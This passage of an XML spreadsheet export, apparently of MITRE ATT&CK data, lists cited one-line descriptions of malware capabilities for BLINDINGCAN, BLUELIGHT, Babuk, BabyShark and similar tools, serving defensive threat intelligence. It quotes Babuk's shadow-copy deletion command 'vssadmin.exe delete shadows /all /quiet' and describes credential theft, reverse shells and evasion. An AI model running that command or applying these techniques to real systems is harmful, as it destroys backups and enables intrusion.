    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to collect the processor type, operation system, computer name, uptime, and whether the system is a laptop or PC.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--6a008820-b742-4ec0-ad56-7494ca911da7</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to gather the username from the system.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--ec037573-058a-43d5-a76e-bd76e99953dd</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to launch a command shell on the system.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--f638cb6d-d725-444f-93f9-02f49b4d9383</t>
  </si>
  <si>
    <t>[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to launch a malicious process.(Citation: TrendMicro Tropic Trooper Mar 2018)</t>
  </si>
  <si>
    <t>relationship--cdf7492f-4cdd-4119-aa5e-0d94a07a3965</t>
  </si>
  <si>
    <t>[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to upload files from a compromised host.(Citation: Microsoft BITSAdmin)</t>
  </si>
  <si>
    <t>relationship--95415ffd-265d-448f-bb39-73c7721d5c42</t>
  </si>
  <si>
    <t>[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to upload and/or download files.(Citation: Microsoft BITSAdmin)</t>
  </si>
  <si>
    <t>relationship--9edfa8b5-2e9f-4022-93b2-fd819156fe95</t>
  </si>
  <si>
    <t>[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to upload and/or download files from SMB file servers.(Citation: Microsoft About BITS)</t>
  </si>
  <si>
    <t>relationship--338c0224-eb50-4027-925a-637ee765b187</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has also obfuscated its C2 traffic as normal traffic to sites such as Github.(Citation: FireEye APT17)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--fd6055a0-7db2-4135-a87f-156354c97f0b</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) uses Microsoft’s TechNet Web portal to obtain a dead drop resolver containing an encoded tag with the IP address of a command and control server.(Citation: FireEye APT17)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--8b0e9de1-a7b0-479e-aee7-76f2549508c6</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to delete files.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>relationship--9fe01f98-e0b3-4749-b9a6-eb10c216c548</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to enumerate files.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>relationship--007cc21a-685a-4701-99c1-20f258cedc7c</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</si>
  <si>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</si>
  <si>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relationship--25ad5783-c7fe-4715-b4ce-c03b36ccdfa8</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to discover processes.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>relationship--5a77e097-3aed-4bd3-b5fc-997746da62ad</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to create a reverse shell.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>relationship--41747c46-1dd1-418b-84e9-75710f17a10c</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has been signed with code-signing certificates such as CodeRipper.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--4a60552c-4abb-4310-be2c-191042ceb637</t>
  </si>
  <si>
    <t xml:space="preserve"> [BLINDINGCAN](https://attack.mitre.org/software/S0520) has uploaded files from victim machines.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--36d45d93-4a7f-4af1-b89a-2c2744f6b535</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has used AES and XOR to decrypt its DLLs.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--ea027248-40a2-403b-a0e9-748bdc8c5667</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has sent user and system information to a C2 server via HTTP POST requests.(Citation: NHS UK BLINDINGCAN Aug 2020)(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--84694171-7b5a-457d-ac1f-304bf0d71d4c</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has deleted itself and associated artifacts from victim machines.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--719676a8-9d6c-4ac6-812b-aa268a9abc88</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) can search, read, write, move, and execute files.(Citation: US-CERT BLINDINGCAN Aug 2020)(Citation: NHS UK BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--ca2f6580-fb02-4687-b514-94bad87f7bf8</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has downloaded files to a victim machine.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--1c33c9cd-afac-490a-b487-bd97c93a14cc</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has lured victims into executing malicious macros embedded within Microsoft Office documents.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--a3b44434-d499-4c30-b42d-7bb0f6b4bfc4</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has attempted to hide its payload by using legitimate file names such as "iconcache.db".(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--44577477-b599-46f0-84bf-7e0de773d848</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has obfuscated code using Base64 encoding.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--48e36609-a492-43a6-b0ab-c27ce106b0e6</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has used Rundll32 to load a malicious DLL.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--c406dfb3-d860-4895-858d-e3092cabd5bb</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has loaded and executed DLLs in memory during runtime on a victim machine.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--a2c141ff-d733-4d73-96af-618ed26b7547</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has been packed with the UPX packer.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--75d297b3-bd2e-4815-9c28-649f7f1d4a62</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has been delivered by phishing emails containing malicious Microsoft Office documents.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--db8bb9fc-49b8-49b7-9123-6468176dd1ad</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has encoded its C2 traffic with Base64.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--46e84bd8-d38f-43e7-b62b-ea211231abef</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has encrypted its C2 traffic with RC4.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--e2f9132b-cb32-4b39-8d6d-fec48be3e92f</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has collected from a victim machine the system name, processor information, OS version, and disk information, including type and free space available.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--11ed4654-a7bf-4063-9452-6d6174b9f8bc</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has collected the victim machine's local IP address information and MAC address.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--856670ef-15ae-4d32-a24d-4aba27297586</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has modified file and directory timestamps.(Citation: US-CERT BLINDINGCAN Aug 2020)(Citation: NHS UK BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--914526ae-3322-440f-b79e-780bb0c84cf5</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has used HTTPS over port 443 for command and control.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--1909b21c-27c1-480b-a550-374af83c47dd</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has executed commands via cmd.exe.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--170fb051-0d3d-4105-b6d2-96c9c68e4b8c</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can zip files before exfiltration.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>relationship--a4361a93-3ce2-4c35-a5d8-9a4fae2dc822</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) has encoded data into a binary blob using XOR.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>relationship--0c3e8b5e-1908-4a17-ba56-f8df99991cd9</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can use different cloud providers for its C2.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>relationship--8d4a82db-fce4-4dcc-a0d3-8aa14cbf2ee3</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can collect passwords stored in web browers, including Internet Explorer, Edge, Chrome, and Naver Whale.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>relationship--965ea950-3680-4317-8f73-996157632a0e</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) has exfiltrated data over its C2 channel.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>relationship--4113ccd6-1134-4cef-bf5b-aca9a2364c82</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can uninstall itself.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>relationship--63e149cc-a5a3-496b-b8c3-4e428f0d5fb9</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can enumerate files and collect associated metadata.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>relationship--bc74cabe-b8bc-4873-a6ff-e16d8f91299f</t>
  </si>
  <si>
    <t xml:space="preserve">[BLUELIGHT](https://attack.mitre.org/software/S0657) can download additional files onto the host.(Citation: Volexity InkySquid BLUELIGHT August 2021) </t>
  </si>
  <si>
    <t>relationship--2161578b-44ef-4c44-90ad-2ee8920a3db8</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) has a XOR-encoded payload.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>relationship--371958b3-0a01-48a4-b035-3a9d44b17388</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can collect process filenames and SID authority level.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>relationship--9d1a9a04-6174-4aaa-8fac-43c965f0bd38</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) has captured a screenshot of the display every 30 seconds for the first 5 minutes after initiating a C2 loop, and then once every five minutes thereafter.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>relationship--e43ab91c-ad83-4469-8a8f-ce3337cdcb12</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can collect a list of anti-virus products installed on a machine.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>relationship--5adfebe4-4bfd-4848-9727-379d7284dcc8</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can harvest cookies from Internet Explorer, Edge, Chrome, and Naver Whale browsers.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>relationship--953091ba-9d00-41ba-8727-014f6d11b5d3</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can check to see if the infected machine has VM tools running.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>relationship--a5d8527f-71eb-48e4-b5af-f95d29fdb265</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) has collected the computer name and OS version from victim machines.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>relationship--1da27474-f902-419e-97a9-1fba8743cce8</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can collect IP information from the victim’s machine.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>relationship--07720e8d-fd8a-449c-ac32-484ccf989694</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can collect the username on a compromised host.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>relationship--0efb0490-9935-4d51-8b2f-974e090bbc10</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can collect the local time on a compromised host.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>relationship--d1d27a0f-ae6d-4058-b0ad-581aaf939e4a</t>
  </si>
  <si>
    <t xml:space="preserve">[BLUELIGHT](https://attack.mitre.org/software/S0657) can use HTTP/S for C2 using the Microsoft Graph API.(Citation: Volexity InkySquid BLUELIGHT August 2021) </t>
  </si>
  <si>
    <t>relationship--bf0c323f-545c-4bd1-959a-5b1a28d4d06d</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) can use DNS and TXT records within its DNS tunneling protocol for command and control.(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>relationship--730a2fb5-2f51-4db1-b4f1-2112d64df4bf</t>
  </si>
  <si>
    <t>19 February 2019</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) uses a DGA to communicate with command and control servers.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--7bfc7122-2dc2-4fd3-be98-2ab87ba4a530</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) uses &lt;code&gt;-windowstyle hidden&lt;/code&gt; to conceal a [PowerShell](https://attack.mitre.org/techniques/T1059/001) window that downloads a payload.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--5c9bea96-819a-4a39-9814-62f3473530a4</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) can download or upload files from its C2 server.(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>relationship--dd4a0bb3-b9f0-4d69-9768-a17d95783398</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) is written in PowerShell.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>relationship--f6d0705a-e4a5-4aae-a8a3-b1c2b7287469</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) persists using a scheduled task that executes every minute.(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>relationship--749e3cb9-316a-4f97-8554-d83a9e19dfc5</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) can read batch commands in a file sent from its C2 server and execute them with cmd.exe.(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>relationship--30f18b5b-a02e-4d15-bfd2-346145453a07</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) has been signed by a valid CA.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>relationship--adbec5d6-1ffe-4b0b-ae03-9c690ff5c507</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) has exploited the loading of the legitimate Dwrite.dll file by actually loading the gdi library, which then loads the gdiplus library and ultimately loads the local Dwrite dll.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>relationship--ee1f163e-7d9b-449a-ba71-0d0091abfb8a</t>
  </si>
  <si>
    <t xml:space="preserve">[BOOSTWRITE](https://attack.mitre.org/software/S0415) has used a a 32-byte long multi-XOR key to decode data inside its payload.(Citation: FireEye FIN7 Oct 2019)	</t>
  </si>
  <si>
    <t>relationship--07bbfaa8-c62f-4abc-845c-55b28434d058</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) has encoded its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit Initialization vector (IV) to evade detection.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>relationship--537fb955-d073-4ec1-a524-a0109ed18e85</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) has used the DWriteCreateFactory() function to load additional modules.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>relationship--db3b37f1-9c85-4e52-bbd7-4b71ad68400d</t>
  </si>
  <si>
    <t>S0114</t>
  </si>
  <si>
    <t>BOOTRASH</t>
  </si>
  <si>
    <t>malware--da2ef4a9-7cbe-400a-a379-e2f230f28db3</t>
  </si>
  <si>
    <t>[BOOTRASH](https://attack.mitre.org/software/S0114) is a Volume Boot Record (VBR) bootkit that uses the VBR to maintain persistence.(Citation: Mandiant M Trends 2016)(Citation: FireEye Bootkits)(Citation: FireEye BOOTRASH SANS)</t>
  </si>
  <si>
    <t>relationship--63d53308-7d7d-4777-a1cc-c7100735609c</t>
  </si>
  <si>
    <t>[BOOTRASH](https://attack.mitre.org/software/S0114) has used unallocated disk space between partitions for a hidden file system that stores components of the Nemesis bootkit.(Citation: FireEye Bootkits)</t>
  </si>
  <si>
    <t>relationship--29a6afc7-f051-4c26-b6a2-cad09c73180f</t>
  </si>
  <si>
    <t>S0014</t>
  </si>
  <si>
    <t>BS2005</t>
  </si>
  <si>
    <t>malware--67fc172a-36fa-4a35-88eb-4ba730ed52a6</t>
  </si>
  <si>
    <t>[BS2005](https://attack.mitre.org/software/S0014) uses Base64 encoding for communication in the message body of an HTTP request.(Citation: Mandiant Operation Ke3chang November 2014)</t>
  </si>
  <si>
    <t>relationship--a805a8d5-632c-48df-909d-c3d745652475</t>
  </si>
  <si>
    <t>[BUBBLEWRAP](https://attack.mitre.org/software/S0043) can communicate using SOCKS.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>relationship--b9b0e376-f249-432f-a0d3-dfa259b4757a</t>
  </si>
  <si>
    <t>[BUBBLEWRAP](https://attack.mitre.org/software/S0043) collects system information, including the operating system version and hostname.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>relationship--ea4c3651-b2a3-418e-8d3b-3c8075b988ef</t>
  </si>
  <si>
    <t>[BUBBLEWRAP](https://attack.mitre.org/software/S0043) can communicate using HTTP or HTTPS.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>relationship--2b2cdb6b-c23c-4792-8cfb-8c4d9279a186</t>
  </si>
  <si>
    <t>S0638</t>
  </si>
  <si>
    <t>Babuk</t>
  </si>
  <si>
    <t>malware--61c7a91a-0b83-461d-ad32-75d96eed4a09</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) can use ChaCha8 and ECDH to encrypt data.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: Medium Babuk February 2021)(Citation: Trend Micro Ransomware February 2021)</t>
  </si>
  <si>
    <t>relationship--18355c9b-c3e8-4bc7-a389-425e5d7c6351</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) has the ability to unpack itself into memory using XOR.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: Medium Babuk February 2021)</t>
  </si>
  <si>
    <t>relationship--114f4fb4-3c0a-44b0-aeaf-2e2a3ba50fa5</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) can stop anti-virus services on a compromised host.(Citation: Sogeti CERT ESEC Babuk March 2021)</t>
  </si>
  <si>
    <t>relationship--9999824c-f85b-4bc2-bb00-e86d4c8c0a22</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) has the ability to enumerate files on a targeted system.(Citation: McAfee Babuk February 2021)(Citation: Trend Micro Ransomware February 2021)</t>
  </si>
  <si>
    <t>relationship--fb819161-4916-4f25-ad81-eab9f02a337e</t>
  </si>
  <si>
    <t>13 August 2021</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) has the ability to delete shadow volumes using &lt;code&gt;vssadmin.exe delete shadows /all /quiet&lt;/code&gt;.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)</t>
  </si>
  <si>
    <t>relationship--813370e8-ec26-4533-b8e2-39474edb7006</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) can use multiple Windows API calls for actions on compromised hosts including discovery and execution.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: Medium Babuk February 2021)</t>
  </si>
  <si>
    <t>relationship--1095b9e8-2849-40c2-b56f-f6bc9d4bc648</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) has the ability to enumerate network shares.(Citation: Sogeti CERT ESEC Babuk March 2021)</t>
  </si>
  <si>
    <t>relationship--bba92907-b2fd-4f62-b356-63fab9d714dd</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) has the ability to check running processes on a targeted system.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: Trend Micro Ransomware February 2021)</t>
  </si>
  <si>
    <t>relationship--cd91751c-a2a2-4626-bb31-b95fd0040818</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) can stop specific services related to backups.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: Trend Micro Ransomware February 2021)</t>
  </si>
  <si>
    <t>relationship--4f5efe16-ce46-4e37-9c9d-d45b14d1ab4c</t>
  </si>
  <si>
    <t>Versions of [Babuk](https://attack.mitre.org/software/S0638) have been packed.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: Medium Babuk February 2021)</t>
  </si>
  <si>
    <t>relationship--4cb25ac9-9eb9-47ee-b3f9-53c5a6365c46</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) can enumerate disk volumes, get disk information, and query service status.(Citation: McAfee Babuk February 2021)</t>
  </si>
  <si>
    <t>relationship--e0140710-f03a-4e43-9e87-45926636b377</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) can use “WNetOpenEnumW” and “WNetEnumResourceW” to enumerate files in network resources for encryption.(Citation: McAfee Babuk February 2021)</t>
  </si>
  <si>
    <t>relationship--0ffa2b36-2a4c-4f40-af47-c56b357f92c8</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) can enumerate all services running on a compromised host.(Citation: McAfee Babuk February 2021)</t>
  </si>
  <si>
    <t>relationship--bebaff50-23e0-43d6-ad31-4d84a3b2af73</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) has the ability to use the command line to control execution on compromised hosts.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)</t>
  </si>
  <si>
    <t>relationship--82066933-1c34-4d79-8e3e-b0e32492cdf0</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has the ability to decode downloaded files prior to execution.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>relationship--843aedaa-bbf0-4f29-bcfd-bd226ca7ef31</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has cleaned up all files associated with the secondary payload execution.(Citation: Unit42 BabyShark Apr 2019)</t>
  </si>
  <si>
    <t>relationship--95dbd3ec-820c-47af-9734-78c39b092bc4</t>
  </si>
  <si>
    <t xml:space="preserve">[BabyShark](https://attack.mitre.org/software/S0414) has used &lt;code&gt;dir&lt;/code&gt; to search for "programfiles" and "appdata".(Citation: Unit42 BabyShark Feb 2019)	</t>
  </si>
  <si>
    <t>relationship--5c738353-868a-4e4d-8628-e1d14e502980</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has downloaded additional files from the C2.(Citation: Unit42 BabyShark Apr 2019)(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>relationship--18d97b33-8ad5-426e-a390-72bea109bee0</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has a [PowerShell](https://attack.mitre.org/techniques/T1059/001)-based remote administration ability that can implement a PowerShell or C# based keylogger.(Citation: Unit42 BabyShark Apr 2019)</t>
  </si>
  <si>
    <t>relationship--3a0c8e81-6110-4cf3-a965-b700e00fd66c</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has used mshta.exe to download and execute applications from a remote server.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>relationship--3759c775-300f-4981-9264-722ecf97aa64</t>
  </si>
  <si>
    <t xml:space="preserve">[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;tasklist&lt;/code&gt; command.(Citation: Unit42 BabyShark Feb 2019)	</t>
  </si>
  <si>
    <t>relationship--54a384e5-17c8-422d-b199-18e7945cb7d6</t>
  </si>
  <si>
    <t xml:space="preserve">[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;reg query&lt;/code&gt; command for &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default&lt;/code&gt;.(Citation: Unit42 BabyShark Feb 2019)	</t>
  </si>
  <si>
    <t>relationship--2f28f6e0-795f-4e0d-8459-514a42a96ce9</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has added a Registry key to ensure all future macros are enabled for Microsoft Word and Excel as well as for additional persistence.(Citation: Unit42 BabyShark Feb 2019)(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>relationship--ab322e5c-dfd2-45dd-bee1-59aec9d1d840</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has used scheduled tasks to maintain persistence.(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>relationship--053d1126-0d8d-4048-be96-d1a395a1fe8c</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has encoded data using [certutil](https://attack.mitre.org/software/S0160) before exfiltration.(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>relationship--94e051ad-2f6d-4322-a854-6ee1944a8904</t>
  </si>
  <si>
    <t xml:space="preserve">[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;ver&lt;/code&gt; command.(Citation: Unit42 BabyShark Feb 2019)	</t>
  </si>
  <si>
    <t>relationship--906699ff-a10f-4527-9173-326965cc51a2</t>
  </si>
  <si>
    <t xml:space="preserve">[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;ipconfig /all&lt;/code&gt; command.(Citation: Unit42 BabyShark Feb 2019)	</t>
  </si>
  <si>
    <t>relationship--cef53316-353b-48f8-bce4-1d95f3ff843e</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;whoami&lt;/code&gt; command.(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>relationship--09fbfb74-459a-441b-9e07-96c146a26be3</t>
  </si>
  <si>
    <t xml:space="preserve">[BabyShark](https://attack.mitre.org/software/S0414) has used cmd.exe to execute commands.(Citation: Unit42 BabyShark Feb 2019)	</t>
  </si>
  <si>
    <t>relationship--fc9a56ec-ef5f-4e45-b004-fe395d6b6d3f</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has been signed with self signed digital certificates mimicking a legitimate software company.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>relationship--01b97c8a-f08c-4f54-a401-14d888ca79b9</t>
  </si>
  <si>
